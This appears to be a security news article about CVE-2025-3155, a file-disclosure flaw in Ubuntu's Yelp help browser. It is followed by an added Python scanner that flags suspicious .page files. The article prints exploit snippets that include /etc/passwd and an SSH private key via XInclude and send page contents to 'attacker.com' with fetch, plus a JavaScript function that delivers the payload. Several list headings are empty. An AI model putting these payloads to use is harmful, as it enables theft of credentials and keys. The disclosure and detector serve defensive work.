Security researchers have uncovered a critical vulnerability (CVE-2025-3155) in Ubuntu’s default help browser Yelp that could expose sensitive system files including SSH private keys.
The flaw impacts Ubuntu desktop installations and stems from improper handling of XML content in GNOME’s help documentation system.
Affected Systems:
Vulnerability Chain:
<include href="/etc/passwd" xmlns="http://www.w3.org/2001/XInclude"/>
<svg:script>onload=_=>fetch("http://attacker.com", {body:document.body})</svg:script>
Attack Scenario Walkthrough
Key Exploit Code Snippet:
<script>
let payloadPage = `<?xml...>
<include href="/proc/self/cwd/.ssh/id_rsa"/>
<svg:script>onload=_=>fetch("http://attacker.com",...)</svg:script>`;
function exp() {
  const blob = new Blob([payloadPage], {type: 'text/plain'});
  const a = document.createElement('a');
  a.href = URL.createObjectURL(blob);
  a.download = 'index.page';
  a.click();
  location = 'ghelp:///proc/self/cwd/Downloads';
}
</script>
Canonical has released patches in Ubuntu security updates dated April 7, 2025. Users are urged to apply updates immediately through standard package channels.
This vulnerability demonstrates three critical risks:
A security researcher noted: “This chain shows how apparently harmless documentation tools can become attack vectors when combined with modern web technologies. The ghelp:// handler’s file inclusion capabilities create unexpected trust boundaries.”
Investigations are ongoing to determine whether this vulnerability was exploited in the wild. Users and enterprises are advised to audit SSH key usage and monitor for suspicious authentication attempts.
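For triage alongside patching, the following added example (not code from the original report, Canonical or GNOME) checks .page help files, such as an index.page dropped into a Downloads folder, for the two markers shown in the snippets above: an XInclude element pointing at a local path and a script element. The function names, finding labels and sample documents are constructed for illustration, and it assumes legitimate help pages carry no DOCTYPE.

```python
import xml.etree.ElementTree as ET
from pathlib import Path

XINCLUDE_NS = "http://www.w3.org/2001/XInclude"

# Constructed sample inputs (not captured files); the script body is an inert placeholder.
SAMPLE_SUSPICIOUS = b"""<page xmlns="http://projectmallard.org/1.0/"
      xmlns:svg="http://www.w3.org/2000/svg" id="index">
  <title>Help</title>
  <include href="/etc/passwd" xmlns="http://www.w3.org/2001/XInclude"/>
  <svg:script>/* constructed placeholder */</svg:script>
</page>"""
SAMPLE_BENIGN = b"""<page xmlns="http://projectmallard.org/1.0/" id="index">
  <title>Help</title>
  <include href="legal.xml" xmlns="http://www.w3.org/2001/XInclude"/>
</page>"""

def audit_page(data: bytes) -> list:
    """Return (label, detail) findings for one .page document; labels are hypothetical."""
    # Assumption: help pages need no DTD, so refuse to parse one (avoids entity expansion).
    if b"<!DOCTYPE" in data:
        return [("doctype-present", "")]
    try:
        root = ET.fromstring(data)  # ElementTree does not resolve XInclude on its own
    except ET.ParseError as exc:
        return [("unparseable", str(exc))]
    findings = []
    for el in root.iter():
        local = el.tag.rsplit("}", 1)[-1].lower()
        if el.tag == f"{{{XINCLUDE_NS}}}include":
            href = el.get("href", "")
            # Absolute paths, file: URLs and parent traversal reach outside the help bundle.
            if href.startswith(("/", "file:")) or ".." in href.split("/"):
                findings.append(("xinclude-local-file", href))
        elif local == "script":
            findings.append(("script-element", (el.text or "").strip()[:80]))
    return findings

def audit_dir(directory: str) -> dict:
    """Scan a directory tree (for example ~/Downloads) for suspicious .page files."""
    report = {}
    for path in Path(directory).rglob("*.page"):
        findings = audit_page(path.read_bytes())
        if findings:
            report[str(path)] = findings
    return report

if __name__ == "__main__":
    print(audit_page(SAMPLE_SUSPICIOUS))
    print(audit_page(SAMPLE_BENIGN))
```

A finding marks a file for manual review; it is not proof of exploitation, and an empty report does not replace applying the security update.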